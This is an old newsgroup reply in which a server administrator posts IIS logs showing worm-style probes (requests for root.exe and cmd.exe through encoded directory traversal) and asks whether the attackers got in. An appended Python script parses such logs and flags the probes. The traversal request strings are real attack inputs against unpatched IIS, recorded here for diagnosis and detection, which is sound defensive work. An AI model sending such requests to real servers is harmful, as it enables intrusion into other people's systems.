Re: Is someone trying to hack my IIS server?
From: Lars Brandt (brandt@ancro.se)
Date: 05/13/02
From: Lars Brandt <brandt@ancro.se> Date: Mon, 13 May 2002 13:53:43 +0200
Hi,
I have closed down port 80 for some time now since we were so badly flooded
with CodeRed (I have the patch!) but thought it had cooled down
now... Obviously that is also still going on...
Now I needed to open it up just to get traffic redirected to another site...
I just wanted to check with the group where I could find that URLscan tool
that David Dickinson mentioned in a posting some time ago?
I have also appended my logs below where you can see that someone is trying to
get in. I do not know if they succeeded, however. Does anyone know this?
Lars
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /scripts/root.exe /c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /MSADC/root.exe /c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /c/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /d/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /scripts/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 194.129.153.20 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 194.129.153.20 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 194.129.153.20 - "myip" 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /scripts/root.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /MSADC/root.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /c/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /d/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /scripts/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET /winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 302 -
David Dickinson [MVP] wrote:
> bubbapcguy wrote:
> > Install the urlscan also and you will reject those scans
> > Bubba
>
> I think he did, which is why those requests are returning 404. URLscan is
> bundled with the IISLockdown tool.
>
> David
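
Added example, not part of the original message: one way to triage a log like the one posted above, grouping shell and traversal probes by client and flagging only those the server did not redirect or reject. The field positions are assumed from the posted lines, the addresses and entries in SAMPLE_LOG are constructed, and the status-code rule is a triage heuristic rather than proof of compromise.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample, same field order as the posted log (assumed layout):
# date time client-ip user server-ip port method uri-stem uri-query status ...
SAMPLE_LOG = """\
2002-05-04 01:59:44 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe /c+dir 302 -
2002-05-04 01:59:44 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2002-05-04 02:10:03 192.0.2.77 - 198.51.100.5 80 GET /default.htm - 200 -
2002-05-04 03:00:00 203.0.113.9 - 198.51.100.5 80 GET /scripts/root.exe /c+dir 200 -
"""

PROBE_TARGET = re.compile(r"/(root|cmd)\.exe$", re.IGNORECASE)


def is_probe(stem):
    """True for requests aimed at a command shell or using ../ traversal."""
    path = unquote(stem).replace("\\", "/")  # %5c and %2f both end up as "/"
    return bool(PROBE_TARGET.search(path)) or "/../" in path


def triage(log_text):
    """Group probe requests by client IP and flag any the server did not refuse."""
    report = defaultdict(lambda: {"probes": 0, "investigate": []})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 10 or fields[0].startswith("#"):
            continue  # skip header directives and truncated lines
        date, time, client = fields[0], fields[1], fields[2]
        stem, status = fields[7], fields[9]
        if not status.isdigit() or not is_probe(stem):
            continue
        entry = report[client]
        entry["probes"] += 1
        # Heuristic: 3xx/4xx means redirected or rejected. 2xx (served) and
        # 5xx (the server tried to run something and failed) need a closer look.
        if status[0] in "25":
            entry["investigate"].append((f"{date} {time}", stem, int(status)))
    return dict(report)


if __name__ == "__main__":
    for ip, entry in triage(SAMPLE_LOG).items():
        print(ip, entry["probes"], "probes,", len(entry["investigate"]), "to investigate")
        for when, stem, status in entry["investigate"]:
            print("   ", when, status, stem)
```
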